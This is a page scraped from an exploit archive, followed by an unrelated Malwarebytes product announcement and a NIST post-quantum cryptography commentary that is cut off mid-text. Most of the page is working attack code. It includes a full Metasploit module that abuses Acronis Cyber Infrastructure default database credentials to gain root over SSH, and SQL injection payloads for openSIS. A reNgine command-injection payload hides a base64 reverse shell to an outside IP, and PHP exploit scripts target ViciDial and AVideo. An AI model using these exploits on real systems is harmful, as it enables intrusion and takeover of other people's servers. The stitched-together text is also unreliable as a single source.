Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage, compute, and network resources. Businesses and Service Providers are using it for data storage, backup storage, creating and managing virtual machines and software-defined networks, running cloud-native applications in production environments. This Metasploit module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database and gain administrative access to the ACI Web Portal. This opens the door for the attacker to upload SSH keys that enables root access to the appliance/server. This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world. ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69, 5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'sshkey'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include BCrypt  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::Postgres  include Msf::Exploit::Remote::SSH  prepend Msf::Exploit::Remote::AutoCheck  # ssh_socket  attr_accessor :ssh_socket  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Acronis Cyber Infrastructure default password remote code execution',        'Description' => %q{          Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage,          compute, and network resources. Businesses and Service Providers are using it for data storage,          backup storage, creating and managing virtual machines and software-defined networks, running          cloud-native applications in production environments.          This module exploits a default password vulnerability in ACI which allow an attacker to access          the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.          This opens the door for the attacker to upload SSH keys that enables root access          to the appliance/server. This attack can be remotely executed over the WAN as long as the          PostgreSQL and SSH services are exposed to the outside world.          ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,          5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Acronis International GmbH', # discovery        ],        'References' => [          ['CVE', '2023-45249'],          ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],          ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']        ],        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Privileged' => true,        'Arch' => [ARCH_CMD],        'Targets' => [          [            'Unix/Linux Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd            }          ],          [            'Interactive SSH',            {              'Type' => :ssh_interact,              'DefaultOptions' => {                'PAYLOAD' => 'generic/ssh/interact'              },              'Payload' => {                'Compat' => {                  'PayloadType' => 'ssh_interact'                }              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-07-24',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 8888,          'USERNAME' => 'vstoradmin',          'PASSWORD' => 'vstoradmin',          'DATABASE' => 'keystone',          'SSH_TIMEOUT' => 30,          'WfsDelay' => 5        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')    register_options([      OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 6432]),      OptPort.new('SSHPORT', [true, 'SSH port', 22]),      OptString.new('PRIV_KEY_FILE', [false, 'SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>)', ''])    ])    register_advanced_options([      OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])    ])  end  # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)  def add_admin_user(username, userid, password)    vprint_status("Creating admin user #{username} with userid #{userid}")    # add new admin user to the user table    res_query = postgres_query("INSERT INTO \"user\" VALUES(\'#{userid}\','{}','T',NULL,NULL,NULL,'default');", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    # add new admin user to the local_user table    res_query = postgres_query('SELECT * FROM "local_user" WHERE id = ( SELECT MAX (id) FROM "local_user" );', datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_luser = res_query[:complete].rows[0][0].to_i + 1    res_query = postgres_query("INSERT INTO \"local_user\" VALUES(\'#{id_luser}\',\'#{userid}\','default',\'#{username}\',NULL,NULL);", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    # hash the password    password_hash = Password.create(password)    today = Date.today    vprint_status("Setting password #{password} with hash #{password_hash}")    res_query = postgres_query('SELECT * FROM "password" WHERE id = ( SELECT MAX (id) FROM "password" );', datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_pwd = res_query[:complete].rows[0][0].to_i + 1    res_query = postgres_query("INSERT INTO \"password\" VALUES(\'#{id_pwd}\',\'#{id_luser}\',NULL,'F',\'#{password_hash}\',0,NULL,DATE \'#{today}\');", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    # Getting the admin roles and assign this to the new admin user    vprint_status('Getting the admin roles')    res_query = postgres_query("SELECT * FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_project_role = res_query[:complete].rows[0][0]    res_query = postgres_query("SELECT * FROM \"role\" WHERE name = 'admin';", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_admin_role = res_query[:complete].rows[0][0]    vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")    res_query = postgres_query("INSERT INTO \"assignment\" VALUES('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F');", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    vprint_status("Successfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")    true  end  # create SSH session.  # based on the ssh_opts can this be key or password based.  # if login is successfull, return true else return false. All other errors will trigger an immediate fail  def do_sshlogin(ip, user, ssh_opts)    begin      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        self.ssh_socket = Net::SSH.start(ip, user, ssh_opts)      end    rescue Rex::ConnectionError      fail_with(Failure::Unreachable, 'Disconnected during negotiation')    rescue Net::SSH::Disconnect, ::EOFError      fail_with(Failure::Disconnected, 'Timed out during negotiation')    rescue Net::SSH::AuthenticationFailed      return false    rescue Net::SSH::Exception => e      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")    end    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket    return true  end  # login at the Acronis Cyber Infrastructure web portal  def aci_login(name, pwd)    post_data = {      username: name.to_s,      password: pwd.to_s    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'),      'data' => post_data.to_s    })    return res&.code == 200  end  # returns cluster id or nil if not found  def get_cluster_id    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'clusters')    })    return unless res&.code == 200    return unless res.body.include?('data') && res.body.include?('id')    # parse json response and get the version    res_json = res.get_json_document    return if res_json.blank?    res_json['data'].each do |cluster|      return cluster['id'] unless cluster['id'].nil?    end  end  # upload the SSH public key using the cluster_id defined at the Acronis Cyber Infrastructure web portal  def upload_sshkey(sshkey, cluster_id)    post_data = {      key: sshkey.to_s,      event:      {        name: 'SshKeys',        method: 'post',        data:        {          key: sshkey.to_s        }      }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', cluster_id.to_s, 'ssh-keys'),      'data' => post_data.to_s    })    return true if res&.code == 202 && res.body.include?('task_id')    false  end  def execute_command(cmd, _opts = {})    Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }  rescue Timeout::Error    @timeout = true  end  # return ACI version-release string or nil if not found  def get_aci_version    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')    })    return unless res&.code == 200    return unless res.body.include?('storage-release')    # parse json response and get the version    res_json = res.get_json_document    return if res_json.blank?    version = res_json['storage-release']['version']    return if version.nil?    release = res_json['storage-release']['release']    return if release.nil?    "#{version}-#{release}".gsub(/[[:space:]]/, '')  end  def check    version_release = get_aci_version    return CheckCode::Unknown('Could not retrieve the version information.') if version_release.nil?    return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')    case version_release.split(/\.\d-/)[0]    when '5.0'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')    when '5.1'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.1.1-71')    when '5.2'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.2.1-69')    when '5.3'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.3.1-53')    when '5.4'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.4.4-132')    end    CheckCode::Safe("Version #{version_release}")  end  def exploit    # connect to the PostgreSQL DB with default credentials    fail_with(Failure::Unreachable, "Can not connect to PostgreSQL DB on port #{datastore['DBPORT']}.") unless postgres_login({ port: datastore['DBPORT'] }) == :connected    # add a new admin user    username = Rex::Text.rand_text_alphanumeric(5..8).downcase    userid = SecureRandom.hex    password = Rex::Text.rand_password    print_status("Creating admin user #{username} with password #{password} for access at the Acronis Admin Portal.")    fail_with(Failure::BadConfig, "Adding admin credentials #{username}:#{password} failed.") unless add_admin_user(username, userid, password)    # storing credentials at the msf database    print_status('Saving admin credentials at the msf database.')    store_valid_credential(user: username, private: password)    # log out from the postsgreSQL DB    postgres_logout if postgres_conn    # create or use own SSH private key    if datastore['PRIV_KEY_FILE'].blank?      print_status('Creating SSH private and public key.')      k = SSHKey.generate(comment: 'root')    else      print_status("Using your own SSH private key file: #{datastore['PRIV_KEY_FILE']} in PEM format.")      fail_with(Failure::NotFound, "Can not find or open SSH private key file: #{datastore['PRIV_KEY_FILE']}") unless File.file?(File.expand_path(datastore['PRIV_KEY_FILE']))      f = File.read(File.expand_path(datastore['PRIV_KEY_FILE']))      k = SSHKey.new(f, comment: 'root')    end    vprint_status(k.private_key)    vprint_status(k.ssh_public_key)    # storing SSH public and private key at the msf database    print_status('Saving SSH public and private key pair at the msf database.')    store_valid_credential(user: 'ACI SSH public key', private: k.ssh_public_key)    store_valid_credential(user: 'ACI SSH private key', private: k.private_key)    # log in with the new admin user credentials at the Acronis Admin Portal    fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)    # get cluster id to upload the SSH keys    print_status('Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.')    cluster_id = get_cluster_id    fail_with(Failure::NotFound, 'Can not find a cluster and retrieve the id.') if cluster_id.nil?    # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH    print_status('Uploading SSH public key at the Acronis Admin Portal.')    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(k.ssh_public_key, cluster_id)    # login with SSH private key to establish SSH root session    ssh_opts = ssh_client_defaults.merge({      auth_methods: ['publickey'],      key_data: [ k.private_key ],      port: datastore['SSHPORT']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    print_status('Authenticating with SSH private key.')    fail_with(Failure::NoAccess, 'Failed to authenticate with SSH.') unless do_sshlogin(datastore['RHOST'], 'root', ssh_opts)    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :ssh_interact      handler(ssh_socket)      return    end    @timeout ? ssh_socket.shutdown! : ssh_socket.close  endend

Acronis Cyber Infrastructure Default Password Remote Code Execution

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

**dizqueTV 1.5.3 Remote Code Execution**

Posted Oct 3, 2024

Authored by Ahmed Said Saud Al-Busaidi

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution

SHA-256 | b18cb14167c97952ef1684789d6a48b83e5c1338a0677edc0b3eaef195497b45

Download | Favorite | View

**dizqueTV 1.5.3 Remote Code Execution**

    # Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)# Date: 9/21/2024# Exploit Author: Ahmed Said Saud Al-Busaidi# Vendor Homepage: https://github.com/vexorian/dizquetv# Version: 1.5.3# Tested on: linuxPOC:## Vulnerability DescriptiondizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.## STEPS TO REPRODUCE1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"3. click on update4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

**File Tags**

*   ActiveX (933)
*   Advisory (87,037)
*   Arbitrary (17,123)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,049)
*   Code Execution (7,927)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,438)
*   DoS (25,312)
*   Encryption (2,395)
*   Exploit (54,379)
*   File Inclusion (4,278)
*   File Upload (1,026)
*   Firewall (822)
*   Info Disclosure (2,927)
*   Intrusion Detection (921)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,313)
*   Local (14,866)
*   Magazine (587)
*   Overflow (13,229)
*   Perl (1,435)
*   PHP (5,293)
*   Proof of Concept (2,415)
*   Protocol (3,753)
*   Python (1,664)
*   Remote (31,931)
*   Root (3,674)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,055)
*   Shell (3,310)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,739)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,135)
*   Web (10,147)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,308)
*   Other

**File Archives**

*   October 2024
*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,132)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,415)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,936)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,896)
*   UNIX (9,464)
*   UnixWare (188)
*   Windows (6,782)
*   Other

dizqueTV 1.5.3 Remote Code Execution

openSIS version 9.1 suffers from a remote SQL injection vulnerability.

    # Exploit Title: openSIS 9.1 - SQLi (Authenticated)# Google Dork: intext:"openSIS is a product"# Date: 09.09.2024# Exploit Author: Devrim Dıragumandan (d0ub1edd)# Vendor Homepage: https://www.os4ed.com/# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1# Version: 9.1# Tested on: LinuxA SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1---    Parameter: X-Forwarded-For #1* ((custom) HEADER)    Type: boolean-based blind    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae--- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

openSIS 9.1 SQL Injection

reNgine version 2.2.0 suffers from an authenticated command injection vulnerability.

    # Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)# Date: 2024-09-29# Exploit Author: Caner Tercan# Vendor Homepage: https://rengine.wiki/# Software Link: https://github.com/yogeshojha/rengine# Version: v2.2.0# Tested on: macOSPOC : 1. Login the Rengine Platform2. Click the Scan Engine3. Modify any Scan Engine4. I modified nmap_cmd parameters on yml config5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.payload :'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh  #’￼￼

reNgine 2.2.0 Command Injection

ViciDial version 2.0.5 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip                                                            |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code add new admin .[+] Line 172 set your target. ( $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); )[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass VICIdialExploit {    private $username;    private $password;    private $targetUri;    private $headers;    public function __construct($username, $password, $targetUri) {        $this->username = $username;        $this->password = $password;        $this->targetUri = $targetUri;        $this->headers = array(            'Authorization' => 'Basic ' . base64_encode($username . ':' . $password)        );    }    public function check() {        $response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php');        if ($response['code'] != 200) {            return 'Unknown';        }        $version_info = $this->extractVersion($response['body']);        if (!$version_info) {            return 'Unknown';        }        $current_version = $this->compareVersion($version_info, '2.14-917a');        return ($current_version <= 0) ? 'Vulnerable' : 'Safe';    }    private function extractVersion($html) {        preg_match("/VERSION:\s*(\d+\.\d+)-(\d+)/", $html, $matches);        return isset($matches[0]) ? $matches[0] : null;    }    private function compareVersion($current, $vulnerable) {        return version_compare($current, $vulnerable);    }    public function exploit() {        $this->startService();        $this->authenticateAdmin();        $this->updateUserSettings();        $this->updateSystemSettings();        $campaignData = $this->createDummyCampaign();        $this->updateCampaignSettings($campaignData['id']);        $this->createDummyList($campaignData['list_name'], $campaignData['id']);        $phoneCreds = $this->fetchPhoneCredentials();        $this->agentPortalAuthentication($phoneCreds['extension'], $phoneCreds['password'], $campaignData['id']);        $this->insertMaliciousRecording($phoneCreds['recording_extension']);        $this->deleteDummyCampaign($campaignData['id']);        $this->waitForCronJob();    }    private function startService() {        // Starting HTTP service logic    }    private function sendRequest($method, $url, $body = null) {        $options = array(            'http' => array(                'method' => $method,                'header' => implode("\r\n", $this->headers)            )        );        if ($body) {            $options['http']['content'] = http_build_query($body);        }        $context = stream_context_create($options);        $result = file_get_contents($url, false, $context);        return array(            'code' => $http_response_header[0],            'body' => $result        );    }    private function authenticateAdmin() {        $response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '3', 'user' => $this->username));        if ($response['code'] != 200) {            throw new Exception('Failed to authenticate with credentials.');        }        echo 'Authenticated successfully as user ' . $this->username;    }    private function updateUserSettings() {        $faker = new Faker\Generator();        $userSettings = array(            'ADD' => '4A',            'user' => $this->username,            'pass' => $this->password,            'full_name' => $faker->name,            'user_group' => 'ADMIN',            'phone_login' => $faker->userName,            'phone_pass' => $faker->password,            'active' => 'Y',            'vicidial_recording' => '1'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $userSettings);        echo 'Updated user settings';    }    private function updateSystemSettings() {        // Fetching system settings logic and making changes    }    private function createDummyCampaign() {        $faker = new Faker\Generator();        $campaignId = rand(100000, 999999);        $listId = $campaignId + 1;        $campaignName = $faker->company;        $campaignSettings = array(            'ADD' => '21',            'campaign_id' => $campaignId,            'campaign_name' => $campaignName,            'user_group' => '---ALL---',            'active' => 'Y'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);        echo 'Created dummy campaign ' . $campaignName;        return array('name' => $campaignName, 'id' => $campaignId, 'list_name' => $campaignName . ' List', 'list_id' => $listId);    }    private function updateCampaignSettings($campaignId) {        $campaignSettings = array(            'ADD' => '41',            'campaign_id' => $campaignId,            'active' => 'Y',            'auto_dial_level' => '1'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);        echo 'Updated dummy campaign settings';    }    private function createDummyList($listName, $campaignId) {        $listSettings = array(            'ADD' => '211',            'list_name' => $listName,            'campaign_id' => $campaignId,            'active' => 'Y'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings);        echo 'Created dummy list ' . $listName;    }    private function fetchPhoneCredentials() {        // Fetching phone credentials logic    }    private function agentPortalAuthentication($extension, $password, $campaignId) {        // Agent portal authentication logic    }    private function insertMaliciousRecording($recordingExtension) {        // Inserting malicious recording logic    }    private function deleteDummyCampaign($campaignId) {        $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '61', 'campaign_id' => $campaignId, 'CoNfIrM' => 'YES'));        echo 'Deleted dummy campaign ' . $campaignId;    }    private function waitForCronJob() {        // Waiting for cron job logic    }}// Usage example:$exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1');$exploit->check();$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ViciDial 2.0.5 Cross Site Request Forgery

AVideo version 12.4 suffers from a PHP code injection vulnerability.

=============================================================================================================================================| # Title     : AVideo 12.4 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://github.com/WWBN/AVideo/tree/master                                                                                  |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 114 set your target.[+] Line 115 set your commands.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass indoushka{    private $target_uri;    private $payload;    public function __construct($target_uri, $payload)    {        $this->target_uri = $target_uri;        $this->payload = $payload;    }    public function exploit()    {        // إعداد الحمولة        $php_code = "<?php " . ($this->isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>";        $filter_payload = $this->generatePhpFilterPayload($php_code);        // إرسال الطلب        $data = http_build_query(['systemRootPath' => $filter_payload]);        $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);        if ($response['code'] !== 200) {            echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n";        }    }    public function check()    {        $response = $this->sendRequest('GET', '/index.php');        if (!$response) {            return 'Failed to connect to the target.';        }        if ($response['code'] !== 200) {            return "Unexpected HTTP response code: " . $response['code'];        }        preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match);        preg_match('//m', $response['body'], $version_match);        if (empty($version_match[1])) {            return 'Unable to extract AVideo version.';        }        $version = $version_match[1];        $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');        if ($plugin_check['code'] !== 200) {            return 'Vulnerable plugin WWBNIndex was not detected';        }        if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) {            return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";        }        return "Detected non-vulnerable AVideo version: {$version}";    }    private function sendRequest($method, $uri, $data = null)    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($method === 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        $response = curl_exec($ch);        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['code' => $http_code, 'body' => $response];    }    private function isArchPHP()    {        // افترض أن الحمولة عبارة عن كود PHP        return true; // أو تحقق من ذلك بناءً على شروط معينة    }    private function generatePhpFilterPayload($php_code)    {        // يجب أن تضيف هنا منطق إعداد الحمولة (تصفية)        return $php_code; // قم بتعديل ذلك بناءً على متطلباتك    }}// مثال على كيفية الاستخدام:$target_uri = "http://target-url.com"; // أدخل عنوان الهدف هنا$payload = "<?php echo 'Hello World!'; ?>"; // الحمولة المراد استخدامها$indoushka = new indoushka($target_uri, $payload);$check_result = $indoushka->check();echo $check_result . "\n";$indoushka->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

AVideo 12.4 Code Injection

Malwarebytes Browser Guard now warns users about recent data breaches, as well as automatically opting users out of tracking cookies.

Two things are true of data online: It will be collected and, just as easily, it will be lost. 

But a major update to Malwarebytes Browser Guard will better protect users from opaque data collection that happens every day online, as well as raising their awareness about corporate data breaches that have left their sensitive information vulnerable to harm.    

First, Browser Guard will now send helpful notifications to users when they visit a website belonging to a company that has suffered a proven data breach in the past 90 days. While everyday users might already know about some of the largest breaches in recent history—AT&T comes to mind—it can be nearly impossible to keep track of every single company that has lost user data in the past.  

With these new data breach notifications, Browser Guard will warn users about recent data breaches they perhaps never heard about, from the 2.2 million people affected by the breach of Rite Aid, to the 1.7 million people affected by the breach of Slim CD, to the 500,000 people affected by the breach of the Texas Dow Employees Credit Union.  

Importantly, Browser Guard will not send repeat notifications that pester return users. The notifications will also include direct access to the Malwarebytes Digital Footprint Portal, allowing users to check in real time whether their data was included in any flagged breach.  

In a second, added feature, Browser Guard is also making it easier to stay private online by automatically opting users out of data collection performed by tracking cookies that are littered across the internet, with no extra effort required on users’ behalf.

These types of cookies are present on nearly every single website that people visit today, from Google to Facebook to YouTube to Reddit. They are invisible pieces of code that advertisers use to track user activity even after they leave a website.

This data, when collected in aggregate, can reveal a person’s age, gender, hometown, relationship status, political beliefs, and so much more. And it’s precisely this data that advertisers want, as it helps them micro-target their ads to, say, new dads in Overland Park, Kansas, looking for a lawnmower, or, first-time homeowners in San Francisco needing a washer and dryer that fit in a small space.

For more than a decade, this type of data collection happened invisibly, but when the European Union passed a sweeping set of data protection rights in 2016, much of that changed.

Following the passage of the law (referred to in short as GDPR), users began to see cumbersome popups everywhere across the web that asked about “cookie preferences”—preferences around how these invisible trackers would collect information both for the website itself and for the advertisers using that website to deliver ads.

With the latest Browser Guard update, cookie consent forms will now be auto-rejected, thus requesting the site to honor the most privacy-preserving settings.

What people experience is a simpler and less aggravating internet, where they’re no longer forced to manage yet another aspect of their privacy.

**Download for Free today:**

For a live look at the new Browser Guard, see the video below.

 Browser Guard now flags data breaches and better protects personal data   

NIST standardized three algorithms for post-quantum cryptography. What does that mean for the information and communications technology (ICT) industry?

Source: Cynthia Lee via Alamy Stock Photo

COMMENTARY

After a grueling eight years of testing, the National Institute of Standards and Technology (NIST) has finalized the first three algorithms that will form the backbone of the world's strategy to counter the potential threats of quantum computing.

Given that enterprising hackers are likely already harvesting and storing massive volumes of encrypted sensitive data for future exploitation, this is welcome news. We have the first post-quantum cryptography (PQC) algorithms to defend against the inevitable attacks on "Q-Day," when a cryptographically relevant quantum computer (CRQC) comes online.

Still, having these NIST-approved algorithms is just the first step. For the information and communications technology (ICT) industry, transitioning to a quantum-safe infrastructure is not a straightforward task; numerous challenges must be overcome. It requires a combination of engineering efforts, proactive assessment, evaluation of available technologies, and a careful approach to product development.

**The Post-Quantum Transition**

PQC algorithms are relatively new, and with no CRQC available to fully test, we cannot yet achieve 100% certainty of their success. Yet we know that any asymmetric cryptographic algorithm based on integer factorization, finite field discrete logarithms, or elliptic curve discrete logarithms will be vulnerable to attacks from a CRQC using Shor's algorithm. That means key agreement schemes (Diffie-Hellman or Elliptic Curve Diffie-Hellman), key transport (RSA encryption) mechanisms, and digital signatures must be replaced.

Conversely, symmetric-key cryptographic algorithms are generally not directly affected by quantum computing advancements and can continue to be used, with potentially straightforward increases to key size to stay ahead of quantum-boosted brute-forcing attacks.

**Hybrid Approach to Security**

The migration to PQC is unique in the history of modern digital cryptography in that neither traditional nor post-quantum algorithms are fully trusted to protect data for the required lifetimes. During the transition from traditional to post-quantum algorithms, we will need to use both algorithm types.

